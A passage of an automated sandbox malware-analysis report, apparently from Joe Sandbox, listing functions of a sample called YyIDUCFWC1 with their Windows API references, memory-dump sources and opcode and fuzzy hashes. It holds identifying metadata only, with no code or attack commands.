                                                                                                                                                                                                                                              • Opcode ID: ff6eab8e1c20f62576dd5b80a10bf311fe0eee1edfd52e03356c0add831f5be3
                                                                                                                                                                                                                                              • Instruction ID: d9c5ea5cf288db7364a9f08ad3975945ad27fe365e420226a32103ffc63e5d27
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ff6eab8e1c20f62576dd5b80a10bf311fe0eee1edfd52e03356c0add831f5be3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1421F671268300AFE350DB64CC45F5B7BF8AF99744F50091EF24596AC0EBB6E408CBA2
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CF3948B Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • IsDebuggerPresent.KERNEL32 ref: 6CF3CE6C
                                                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6CF3CE81
                                                                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(6CF59428), ref: 6CF3CE8C
                                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 6CF3CEA8
                                                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 6CF3CEAF
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2579439406-0
                                                                                                                                                                                                                                              • Opcode ID: 630cd294f0da7af365eddfba08bdeffe8bf19d28c3fbfd8fc70f5beb687c088e
                                                                                                                                                                                                                                              • Instruction ID: 699012fe64283fa3d9cde536ce49a57996962de2b4a8dd9914dc5d56af06c30c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 630cd294f0da7af365eddfba08bdeffe8bf19d28c3fbfd8fc70f5beb687c088e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1621F475E20224DFEFDAEF28E048B457BB0FB0B304F604919E90987B40E7B049818F65
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CF32310 Relevance: 6.7, APIs: 4, Instructions: 663COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6CF324A1
                                                                                                                                                                                                                                                • Part of subcall function 6CF3AC75: RaiseException.KERNEL32(?,?,6CF39C34,FF0C5935,?,?,?,?,6CF39C34,FF0C5935,6CF69C90,6CF7B974,FF0C5935), ref: 6CF3ACB7
                                                                                                                                                                                                                                              • std::exception::exception.LIBCMT ref: 6CF3248C
                                                                                                                                                                                                                                                • Part of subcall function 6CF39533: std::exception::_Copy_str.LIBCMT ref: 6CF3954E
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Copy_strExceptionException@8RaiseThrowstd::exception::_std::exception::exception
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 757275642-0
                                                                                                                                                                                                                                              • Opcode ID: 6d9da8169c514153f383ca3590b02eefa98d3608a7b085bee2292b31de1b0d8e
                                                                                                                                                                                                                                              • Instruction ID: 210a0a81f9101c47e5e3dd2cce55e6801dcefd860177ad0eb132b4ee95ffa3c4
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6d9da8169c514153f383ca3590b02eefa98d3608a7b085bee2292b31de1b0d8e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5332B375A01615AFDB04CFA8C494A9EB7B5FF89704F24512CE80A9BB51EB31ED05CBE0
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CF25DD0 Relevance: 6.4, APIs: 4, Instructions: 390COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: e43896528be257e5c2ade9bb5e0a6c1de3bb45f15edb03eca1ab42a117b4e715
                                                                                                                                                                                                                                              • Instruction ID: 99af265d228b131fd015d1f6c6b5771de8abaebd6944c04d300ed7deb40f3fa2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e43896528be257e5c2ade9bb5e0a6c1de3bb45f15edb03eca1ab42a117b4e715
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9A02BE70A283648FC785CF69E8A467EBBF1EBCB211F41090EE5F653291C234A558CB75
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CF25EB9 Relevance: 6.3, APIs: 4, Instructions: 318COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _memmove
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4104443479-0
                                                                                                                                                                                                                                              • Opcode ID: 3c4241c6714eedd2c979892624dd70237ae311ab859d846e4b161e0ee15acdd1
                                                                                                                                                                                                                                              • Instruction ID: 30d84a16bb94cff26a9f52abae9d91373363eb6b122ed2090ea98aed496a5462
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3c4241c6714eedd2c979892624dd70237ae311ab859d846e4b161e0ee15acdd1
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 20E18F70A283648FC785CB69E8A467E7FF1EBC7211F41090EE1F557291D234A169CB35
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 05B00930 Relevance: 5.3, Strings: 4, Instructions: 336COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1709698902.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5b00000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: HERE$LOOK$Gvq$Gvq
                                                                                                                                                                                                                                              • API String ID: 0-802966049
                                                                                                                                                                                                                                              • Opcode ID: e77589e3b62168c0c7533371e7c37f09c78d6a893411e47f7422202663a8e92d
                                                                                                                                                                                                                                              • Instruction ID: 96d8523963d8eedf22c792081f326951e670ffe4a7d683a928b5643678aed9a9
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e77589e3b62168c0c7533371e7c37f09c78d6a893411e47f7422202663a8e92d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E9F1AF74E452298FDB64DF69C988B99BBF2BB48310F5092E6D40DA7351DB30AE808F50
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CF2DE00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57encryptionCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CryptGenRandom.ADVAPI32(?,?,?,FF0C5935,00000000), ref: 6CF2DE6F
                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6CF2DEB9
                                                                                                                                                                                                                                                • Part of subcall function 6CF2DD20: CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000000,6CF4F0E6,000000FF,6CF2DF67,00000000,?), ref: 6CF2DDB4
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Crypt$ContextException@8RandomReleaseThrow
                                                                                                                                                                                                                                              • String ID: CryptGenRandom
                                                                                                                                                                                                                                              • API String ID: 1047471967-3616286655
                                                                                                                                                                                                                                              • Opcode ID: 1b4ea704ef6b143b37f34c0a851d312b28e0ffb8eb002e56a10061c0ad79102e
                                                                                                                                                                                                                                              • Instruction ID: c01519951645f4e900a3886c3016c224dae73e92f6c19009c52b313231aaece6
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1b4ea704ef6b143b37f34c0a851d312b28e0ffb8eb002e56a10061c0ad79102e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1B214A715183409FC751DF64D444B9ABBF4BF8A718F404A0EF4A987B80EB75E508CBA2
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CF263B0 Relevance: 5.1, APIs: 3, Instructions: 648COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _memmove
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4104443479-0
                                                                                                                                                                                                                                              • Opcode ID: fd03f6bc81acd4e6e4470567f974d119d48b1506748e19aa4ed220897c091d98
                                                                                                                                                                                                                                              • Instruction ID: 2fb336e9cf9577b49d472fbc75ce6245da55e60569de393d547db3764af199b6
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fd03f6bc81acd4e6e4470567f974d119d48b1506748e19aa4ed220897c091d98
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1C5244706246658FC385CF29D490926BBF2EFCA311799C54EE5C68B39AC334F552CBA0
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CF2D9D0 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 126COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(00000010,FF0C5935,75A8FC30,?,00000000), ref: 6CF2DA1A
                                                                                                                                                                                                                                                • Part of subcall function 6CED4010: std::_Xinvalid_argument.LIBCPMT ref: 6CED402A
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorLastXinvalid_argumentstd::_
                                                                                                                                                                                                                                              • String ID: operation failed with error $OS_Rng:
                                                                                                                                                                                                                                              • API String ID: 406877150-700108173
                                                                                                                                                                                                                                              • Opcode ID: adbc27646a449771d0192600e5dd2d89f15f6a772c2361ea712db0cad98da9da
                                                                                                                                                                                                                                              • Instruction ID: f388765b396d6957369028c476791adc57d4d6ef68a5e84e65a6387ee0625d9d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: adbc27646a449771d0192600e5dd2d89f15f6a772c2361ea712db0cad98da9da
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 01415EB1908390AFD321CF69D841B9BBBE8BF99744F10492EE18D87741DB759508CBA3
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CF31CA0 Relevance: 3.6, APIs: 2, Instructions: 619COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • std::exception::exception.LIBCMT ref: 6CF31E1D
                                                                                                                                                                                                                                                • Part of subcall function 6CF39533: std::exception::_Copy_str.LIBCMT ref: 6CF3954E
                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6CF31E32
                                                                                                                                                                                                                                                • Part of subcall function 6CF3AC75: RaiseException.KERNEL32(?,?,6CF39C34,FF0C5935,?,?,?,?,6CF39C34,FF0C5935,6CF69C90,6CF7B974,FF0C5935), ref: 6CF3ACB7
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Copy_strExceptionException@8RaiseThrowstd::exception::_std::exception::exception
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 757275642-0
                                                                                                                                                                                                                                              • Opcode ID: 441b9e0feacfc1395ca3590e070462eb5baf10fa306fe352bc449f607c6e0423
                                                                                                                                                                                                                                              • Instruction ID: b04c10e8e0c7320a5443674443c893ac3accd4fbe791591e58786fada753e682
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 441b9e0feacfc1395ca3590e070462eb5baf10fa306fe352bc449f607c6e0423
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6932E771A01615AFDB08CF98C894AEEB3B5FF89744B14911DE51A9BB50EB31ED04CBE0
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 02D578E0 Relevance: 2.8, Strings: 2, Instructions: 260COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1700874712.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2d50000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: Xbq$$^q
                                                                                                                                                                                                                                              • API String ID: 0-1593437937
                                                                                                                                                                                                                                              • Opcode ID: c622d6b3d9b1d1ece61fbe026a23db01bc96f3e15952f889a6f537a0575c66a5
                                                                                                                                                                                                                                              • Instruction ID: 6251309b226820fd0c9f141260102aaf94d2f216c304c6e51be95115e924ed5a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c622d6b3d9b1d1ece61fbe026a23db01bc96f3e15952f889a6f537a0575c66a5
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C7816274F406188BDB18AF79C85467EBBB7BFC8750B148929D446EB384CE348D06C795
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CF40B89 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 2e94052832d1836e0327850d0129e1775a765406e84b628a94ae1abde6fba01d
                                                                                                                                                                                                                                              • Instruction ID: 3be6b302885deb1e865556c0abf856f252d3f8467a3258da693e4c49acfe7a5d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2e94052832d1836e0327850d0129e1775a765406e84b628a94ae1abde6fba01d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FA320422E3AF414DDB639534C92133676A9AFB73C8F65D727E815B5D96EB29C0C34100
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

